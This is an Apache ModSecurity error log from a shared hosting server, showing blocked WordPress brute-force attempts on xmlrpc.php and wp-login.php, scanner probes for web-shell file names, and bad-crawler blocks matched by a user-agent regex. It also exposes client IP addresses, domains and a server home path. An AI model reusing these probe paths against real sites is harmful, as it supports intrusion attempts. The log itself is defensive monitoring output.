[Tue May 26 15:53:20.939412 2026] [security2:error] [pid 745492:tid 745715] [client 114.119.153.38:42229] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/partners.php"] [unique_id "ahV0mImEQglTmoWcfxKG8gAAAN8"], referer: https://www.ameritradeng.com/
[Tue May 26 15:53:21.915818 2026] [security2:error] [pid 745492:tid 745637] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0mYmEQglTmoWcfxKG-gAAAJE"]
[Tue May 26 15:53:22.452825 2026] [security2:error] [pid 745492:tid 745615] [remote 74.7.241.58:54834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV0momEQglTmoWcfxKHBAAAonc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/wp-admin/includes
[Tue May 26 15:53:22.818668 2026] [security2:error] [pid 745492:tid 745707] [client 103.44.52.196:40576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0momEQglTmoWcfxKHCAAAANc"]
[Tue May 26 15:53:22.818872 2026] [security2:error] [pid 745492:tid 745707] [client 103.44.52.196:40576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0momEQglTmoWcfxKHCAAAANc"]
[Tue May 26 15:53:22.851406 2026] [security2:error] [pid 745492:tid 745666] [client 103.153.130.62:57256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0momEQglTmoWcfxKHCgAAAK4"]
[Tue May 26 15:53:22.851524 2026] [security2:error] [pid 745492:tid 745666] [client 103.153.130.62:57256] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0momEQglTmoWcfxKHCgAAAK4"]
[Tue May 26 15:53:24.250231 2026] [security2:error] [pid 745492:tid 745651] [client 143.110.243.118:50012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/pvt.php"] [unique_id "ahV0nImEQglTmoWcfxKHHAAAAJ8"]
[Tue May 26 15:53:24.590182 2026] [security2:error] [pid 747840:tid 747977] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0nIm6MwAuYuZKxvn-bQAAARE"]
[Tue May 26 15:53:26.652252 2026] [security2:error] [pid 747840:tid 748096] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0nom6MwAuYuZKxvn-kwAAAYg"]
[Tue May 26 15:53:27.876712 2026] [security2:error] [pid 747840:tid 747973] [client 106.219.85.83:26453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0n4m6MwAuYuZKxvn-swAAAQ0"]
[Tue May 26 15:53:27.876969 2026] [security2:error] [pid 747840:tid 747973] [client 106.219.85.83:26453] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0n4m6MwAuYuZKxvn-swAAAQ0"]
[Tue May 26 15:53:29.214707 2026] [security2:error] [pid 747840:tid 748027] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0oIm6MwAuYuZKxvn-wQAAAUM"]
[Tue May 26 15:53:30.894046 2026] [security2:error] [pid 747840:tid 748051] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0oom6MwAuYuZKxvn-4QAAAVs"]
[Tue May 26 15:53:31.407867 2026] [security2:error] [pid 745492:tid 745705] [client 223.123.35.44:36253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0o4mEQglTmoWcfxKHYgAAANU"]
[Tue May 26 15:53:31.408011 2026] [security2:error] [pid 745492:tid 745705] [client 223.123.35.44:36253] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0o4mEQglTmoWcfxKHYgAAANU"]
[Tue May 26 15:53:33.026931 2026] [security2:error] [pid 747840:tid 747999] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0pIm6MwAuYuZKxvn_EgAAASc"]
[Tue May 26 15:53:33.259105 2026] [security2:error] [pid 747840:tid 748024] [client 103.153.130.62:57549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0pYm6MwAuYuZKxvn_HgAAAUA"]
[Tue May 26 15:53:33.259228 2026] [security2:error] [pid 747840:tid 748024] [client 103.153.130.62:57549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0pYm6MwAuYuZKxvn_HgAAAUA"]
[Tue May 26 15:53:33.336146 2026] [security2:error] [pid 747840:tid 748059] [client 103.44.52.196:54394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0pYm6MwAuYuZKxvn_HwAAAWM"]
[Tue May 26 15:53:33.336314 2026] [security2:error] [pid 747840:tid 748059] [client 103.44.52.196:54394] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0pYm6MwAuYuZKxvn_HwAAAWM"]
[Tue May 26 15:53:33.968524 2026] [security2:error] [pid 747840:tid 747985] [client 172.86.66.156:55980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV0pYm6MwAuYuZKxvn_JwAAARk"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 15:53:33.968665 2026] [security2:error] [pid 747840:tid 747985] [client 172.86.66.156:55980] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV0pYm6MwAuYuZKxvn_JwAAARk"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 15:53:34.947957 2026] [security2:error] [pid 747840:tid 748066] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0pom6MwAuYuZKxvn_OQAAAWo"]
[Tue May 26 15:53:36.643716 2026] [security2:error] [pid 745492:tid 745717] [client 143.110.243.118:55096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/shell20211028.php"] [unique_id "ahV0qImEQglTmoWcfxKHjwAAAOE"]
[Tue May 26 15:53:37.335264 2026] [security2:error] [pid 745492:tid 745685] [client 103.169.186.147:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0qImEQglTmoWcfxKHkwAAAME"]
[Tue May 26 15:53:37.378458 2026] [security2:error] [pid 747840:tid 748084] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0qIm6MwAuYuZKxvn_XQAAAXw"]
[Tue May 26 15:53:38.169720 2026] [security2:error] [pid 747840:tid 747973] [client 139.180.227.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0qom6MwAuYuZKxvn_eAAAAQ0"], referer: https://www.anujtradingco.com/
[Tue May 26 15:53:38.377580 2026] [security2:error] [pid 747840:tid 748069] [client 106.219.85.83:23515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0qom6MwAuYuZKxvn_ggAAAW0"]
[Tue May 26 15:53:38.377696 2026] [security2:error] [pid 747840:tid 748069] [client 106.219.85.83:23515] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0qom6MwAuYuZKxvn_ggAAAW0"]
[Tue May 26 15:53:38.388852 2026] [security2:error] [pid 747840:tid 748078] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0qYm6MwAuYuZKxvn_cQAAAXY"]
[Tue May 26 15:53:38.889135 2026] [security2:error] [pid 745492:tid 745641] [client 143.110.243.118:55106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/cgi-bin/wp-2019.php"] [unique_id "ahV0qomEQglTmoWcfxKHpgAAAJU"]
[Tue May 26 15:53:40.968842 2026] [security2:error] [pid 747840:tid 748005] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0rIm6MwAuYuZKxvn_rAAAAS0"]
[Tue May 26 15:53:41.103408 2026] [security2:error] [pid 747840:tid 748058] [client 81.167.26.57:25615] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahV0rYm6MwAuYuZKxvn_vAAAAWI"]
[Tue May 26 15:53:41.103535 2026] [security2:error] [pid 747840:tid 748058] [client 81.167.26.57:25615] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahV0rYm6MwAuYuZKxvn_vAAAAWI"]
[Tue May 26 15:53:41.283390 2026] [security2:error] [pid 747840:tid 748095] [client 74.7.244.9:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mail.rehobothindependentcare.com"] [uri "/index.php"] [unique_id "ahV0rIm6MwAuYuZKxvn_ugAAAYc"]
[Tue May 26 15:53:41.284375 2026] [security2:error] [pid 745492:tid 745655] [client 74.7.244.9:43384] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mail.rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahV0rImEQglTmoWcfxKHuAAAozo"]
[Tue May 26 15:53:42.417076 2026] [security2:error] [pid 747840:tid 747974] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0rom6MwAuYuZKxvn_0QAAAQ4"]
[Tue May 26 15:53:42.479988 2026] [security2:error] [pid 747840:tid 748021] [client 139.180.227.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0rom6MwAuYuZKxvn_4wAAAT0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1239681&moderation-hash=56ffcf4ca23706c5a7783305a251802f
[Tue May 26 15:53:43.597056 2026] [security2:error] [pid 747840:tid 747991] [client 103.153.130.62:57841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0r4m6MwAuYuZKxvn_9QAAAR8"]
[Tue May 26 15:53:43.597195 2026] [security2:error] [pid 747840:tid 747991] [client 103.153.130.62:57841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0r4m6MwAuYuZKxvn_9QAAAR8"]
[Tue May 26 15:53:43.760859 2026] [security2:error] [pid 747840:tid 748046] [client 103.44.52.196:59748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0r4m6MwAuYuZKxvn_-gAAAVY"]
[Tue May 26 15:53:43.760969 2026] [security2:error] [pid 747840:tid 748046] [client 103.44.52.196:59748] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0r4m6MwAuYuZKxvn_-gAAAVY"]
[Tue May 26 15:53:45.189286 2026] [security2:error] [pid 745492:tid 745634] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0sImEQglTmoWcfxKH0gAAAI4"]
[Tue May 26 15:53:46.617470 2026] [security2:error] [pid 747840:tid 748073] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0som6MwAuYuZKxvkAPgAAAXE"]
[Tue May 26 15:53:46.880095 2026] [security2:error] [pid 747840:tid 748082] [client 114.119.134.220:58493] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahV0som6MwAuYuZKxvkATQAAAXo"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2024-01-06
[Tue May 26 15:53:47.120314 2026] [security2:error] [pid 747840:tid 747924] [remote 165.22.95.96:53788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV0som6MwAuYuZKxvkATgABaVM"]
[Tue May 26 15:53:48.241835 2026] [security2:error] [pid 745492:tid 745704] [client 223.123.35.44:36255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0tImEQglTmoWcfxKH-gAAANQ"]
[Tue May 26 15:53:48.241970 2026] [security2:error] [pid 745492:tid 745704] [client 223.123.35.44:36255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0tImEQglTmoWcfxKH-gAAANQ"]
[Tue May 26 15:53:49.088509 2026] [security2:error] [pid 747840:tid 747925] [remote 167.71.132.111:51620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.132.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahV0tIm6MwAuYuZKxvkAcQABWFQ"]
[Tue May 26 15:53:49.116132 2026] [security2:error] [pid 745492:tid 745664] [client 106.219.85.83:17971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0tImEQglTmoWcfxKIDAAAAKw"]
[Tue May 26 15:53:49.116296 2026] [security2:error] [pid 745492:tid 745664] [client 106.219.85.83:17971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0tImEQglTmoWcfxKIDAAAAKw"]
[Tue May 26 15:53:49.193293 2026] [security2:error] [pid 747840:tid 748018] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0tIm6MwAuYuZKxvkAawAAATo"]
[Tue May 26 15:53:51.316567 2026] [security2:error] [pid 747840:tid 748057] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0tom6MwAuYuZKxvkAggAAAWE"]
[Tue May 26 15:53:51.505903 2026] [core:crit] [pid 747840:tid 748016] (13)Permission denied: [client 40.77.167.159:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:53:52.625191 2026] [security2:error] [pid 747840:tid 747982] [client 98.158.233.162:48031] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV0uIm6MwAuYuZKxvkAmQAAARY"], referer: https://anujtradingco.com
[Tue May 26 15:53:53.304726 2026] [security2:error] [pid 747840:tid 748030] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0uIm6MwAuYuZKxvkAoAAAAUY"]
[Tue May 26 15:53:53.658712 2026] [security2:error] [pid 745492:tid 745582] [remote 57.141.2.13:37449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/temple-significance.php"] [unique_id "ahV0uYmEQglTmoWcfxKIVAAAqlY"]
[Tue May 26 15:53:54.065503 2026] [security2:error] [pid 745492:tid 745669] [client 143.110.243.118:60896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/crypted.php"] [unique_id "ahV0uomEQglTmoWcfxKIXAAAALE"]
[Tue May 26 15:53:54.163646 2026] [security2:error] [pid 745492:tid 745659] [client 103.153.130.62:58125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0uomEQglTmoWcfxKIWwAAAKc"]
[Tue May 26 15:53:54.163819 2026] [security2:error] [pid 745492:tid 745659] [client 103.153.130.62:58125] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0uomEQglTmoWcfxKIWwAAAKc"]
[Tue May 26 15:53:54.330429 2026] [security2:error] [pid 745492:tid 745655] [client 103.44.52.196:47958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0uomEQglTmoWcfxKIYwAAAKM"]
[Tue May 26 15:53:54.330686 2026] [security2:error] [pid 745492:tid 745655] [client 103.44.52.196:47958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0uomEQglTmoWcfxKIYwAAAKM"]
